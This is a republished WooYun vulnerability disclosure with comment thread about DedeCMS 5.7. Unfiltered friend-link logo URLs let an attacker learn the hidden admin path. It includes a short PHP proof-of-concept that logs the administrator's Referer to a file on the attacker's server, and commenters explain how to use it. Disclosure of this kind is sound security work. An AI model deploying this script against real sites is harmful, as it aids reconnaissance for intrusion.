织梦某处设计缺陷导致后台地址泄露

admin 2015年6月19日16:27:16评论372 views字数 225阅读0分45秒阅读模式
摘要

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-11-18: 细节向核心白帽子及相关领域专家公开
2014-11-28: 细节向普通白帽子公开
2014-12-08: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

漏洞概要 关注数(128) 关注此漏洞

缺陷编号: WooYun-2014-76556

漏洞标题: 织梦某处设计缺陷导致后台地址泄露 织梦某处设计缺陷导致后台地址泄露

相关厂商: Dedecms

漏洞作者: MuZhU0

提交时间: 2014-09-19 14:26

公开时间: 2014-12-15 14:28

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 逻辑错误 设计不当

26人收藏


漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-11-18: 细节向核心白帽子及相关领域专家公开
2014-11-28: 细节向普通白帽子公开
2014-12-08: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

某处设计缺陷,程序对某些东西过滤不严,导致后台地址泄露,仅测试了5.7。目测其它版本同样存在问题。

详细说明:

织梦某处设计缺陷导致后台地址泄露

DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。

且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。

织梦某处设计缺陷导致后台地址泄露

X.PHP 代码:

<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("x.jpg");

imagejpeg($img);

imagedestroy($img);

?>

当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。

织梦某处设计缺陷导致后台地址泄露

漏洞证明:

织梦某处设计缺陷导致后台地址泄露

X.PHP 代码:

<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("x.jpg");

imagejpeg($img);

imagedestroy($img);

?>

当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。

织梦某处设计缺陷导致后台地址泄露

修复方案:

应该都明白的,我就不献丑了。

版权声明:转载请注明来源 MuZhU0@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-15 14:28

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

0%

0%

0%

0%


评价

  1. 2014-09-19 14:27 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    0

    刘明~!

  2. 2014-09-19 14:38 | 玉林嘎 织梦某处设计缺陷导致后台地址泄露 ( 普通白帽子 | Rank:941 漏洞数:108 )

    0

    这个好!

  3. 2014-09-19 15:15 | 赈早见琥珀主 ( 实习白帽子 | Rank:37 漏洞数:5 )

    0

    目测要火

  4. 2014-09-19 15:21 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    最需要的就是这个玩意了!

  5. 2014-09-19 15:30 | Safe ( 路人 | Rank:0 漏洞数:1 | 一个平凡的人)

    0

    有这个BUG,妈妈再也不用担心你找不到后台了

  6. 2014-09-19 15:31 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    0

    我去,这个威力略大

  7. 2014-09-19 15:56 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)

    0

    哈哈!!!!!

  8. 2014-09-19 16:15 | Grayon ( 路人 | Rank:12 漏洞数:6 | 今天怎么不开心 :‮)

    0

    我喜欢这个

  9. 2014-09-20 07:49 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖,不如相濡以沫)

    0

    卧槽

  10. 2014-09-22 10:22 | menmen519 ( 普通白帽子 | Rank:970 漏洞数:166 | http://menmen519.blog.sohu.com/)

    0

    这个给力,一直是个头痛的问题

  11. 2014-09-23 20:18 | Azui ( 实习白帽子 | Rank:61 漏洞数:15 | 人有两件宝,双手和大脑。)

    0

    这个比较屌

  12. 2014-09-25 10:50 | 微尘 ( 普通白帽子 | Rank:234 漏洞数:78 )

    0

    为毛还不公开

  13. 2014-09-25 10:50 | 微尘 ( 普通白帽子 | Rank:234 漏洞数:78 )

    0

    @MuZhU0 直接漏点吧,不用怕我们会LJ你的。放心我们都不是什么好人

  14. 2014-09-25 17:54 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    0

    @微尘 哈哈哈,这个东西其实非常鸡肋。

  15. 2014-09-26 09:01 | 发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)

    0

    别是日志就行。。

  16. 2014-09-26 14:04 | emeditor ( 路人 | Rank:2 漏洞数:1 | 过来乌云学习 求大神别黑)

    0

    这个必须能火…

  17. 2014-09-26 20:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    哈哈 幸亏厂商无良...

  18. 2014-09-26 22:09 | 风情万种 ( 普通白帽子 | Rank:195 漏洞数:66 | 不再相信爱了)

    0

    我喜欢!

  19. 2014-09-27 10:56 | lck丶 ( 路人 | Rank:6 漏洞数:2 | 求大牛拿0day砸死)

    0

    卧槽

  20. 2014-09-27 14:33 | 微尘 ( 普通白帽子 | Rank:234 漏洞数:78 )

    0

    @MuZhU0 不是那个日志吧?求漏电有木有

  21. 2014-09-27 18:09 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    0

    @微尘 既然忽略了,就说了吧。友情链接申请哪里可以提交PHP文件,管理员后台看友情链接申请的时候,PHP获取来源页就行了。

  22. 2014-09-27 18:16 | 风情万种 ( 普通白帽子 | Rank:195 漏洞数:66 | 不再相信爱了)

    0

    @MuZhU0 这样子的哇!有点鸡肋啊

  23. 2014-09-27 20:45 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    0

    @风情万种 是哇,鸡肋。

  24. 2014-09-27 20:50 | Azui ( 实习白帽子 | Rank:61 漏洞数:15 | 人有两件宝,双手和大脑。)

    0

    @MuZhU0 我记得之前就有人发过 通过流量统计那边查看管理员访问的链接,原理一样,鸡肋- -。

  25. 2014-10-02 21:21 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    0

    必须会火,求关注

  26. 2014-10-11 14:37 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    0

    需要交互嘛~~

  27. 2014-10-11 15:57 | 0x334 ( 普通白帽子 | Rank:181 漏洞数:39 | 漏洞无影响,已忽略~~~~~~~)

    0

    利用确实有点鸡肋

  28. 2014-10-13 14:32 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    0

    referer一直是个让人不省心的的东西啊

  29. 2014-10-14 11:25 | chowner ( 路人 | Rank:4 漏洞数:2 | 运维工程师 兼职搞安全)

    0

    referer,难怪被忽略,还需要交互。。

  30. 2014-12-15 14:37 | 老黑 ( 普通白帽子 | Rank:180 漏洞数:67 | 最爱红颜不老。)

    1

    图片也可以查看REFFER啊 为什么一定要ASP PHP呢

  31. 2014-12-15 17:46 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    1

    @老黑 PHP写出文件不是更方便嘛。

  32. 2014-12-24 17:47 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    1

    x.txt ? 本地 还是 目标站?

  33. 2014-12-25 08:58 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    1

    x.txt 是写入到根目录还是哪里...楼主

  34. 2015-01-17 10:22 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    1

    @带我玩 是自己本地的,试下就知道了

  35. 2015-01-17 10:22 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    1

    @Mxx 是自己本地的,试下就知道了

  36. 2015-01-18 15:34 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    1

    @Sofia 测试跳转到后台?

  37. 2015-01-18 16:11 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    1

    @Mxx 这个很简单啊,就是远程链接一个自己服务器的php文件,管理访问后台那个地方的时候就会加载这个php,然后自己这个php文件同目录会生成x.txt文件,里面记录了referer,就是后台路径

  38. 2015-01-19 14:36 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    0

    @Sofia 我懂了,谢了。

  39. 2015-01-22 15:24 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    0

    这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer

  40. 2015-08-05 23:07 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    0

    这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer

  41. 2015-08-24 14:57 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    0

    大爱

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin